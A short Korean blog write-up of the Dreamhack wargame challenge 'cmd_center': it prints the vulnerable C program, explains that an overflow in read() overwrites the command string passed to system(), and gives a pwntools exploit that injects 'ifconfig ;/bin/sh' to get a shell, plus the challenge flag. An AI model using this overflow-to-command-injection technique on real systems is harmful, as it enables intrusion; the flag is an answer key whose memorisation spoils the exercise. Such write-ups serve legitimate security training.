[Dreamhack] cmd

Wargame/Dreamhack

[Dreamhack] cmd_center

coderrim 2023. 11. 25. 18:19

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void init() {
	setvbuf(stdin, 0, 2, 0);
	setvbuf(stdout, 0, 2, 0);
}

int main()
{

	char cmd_ip[256] = "ifconfig";
	int dummy;
	char center_name[24];

	init();

	printf("Center name: ");
	read(0, center_name, 100);


	if( !strncmp(cmd_ip, "ifconfig", 8)) {
		system(cmd_ip);
	}

	else {
		printf("Something is wrong!\n");
	}
	exit(0);
}

system 함수로 명령어 실행 -> Command Injection 발생 위험

read(0, center_name, 100) 부분에서 BOF 발생 -> cmd_ip 조작 위험

offset: 0x20

from pwn import *

warnings.filterwarnings( 'ignore' )
p = remote('host3.dreamhack.games',11339)

payload = b'A' * 0x20
payload += b"ifconfig ;/bin/sh"

p.sendlineafter("Center name: ", payload)
p.interactive()

DH{f4c11bf9ea5a1df24175ee4d11da0d16}

저작자표시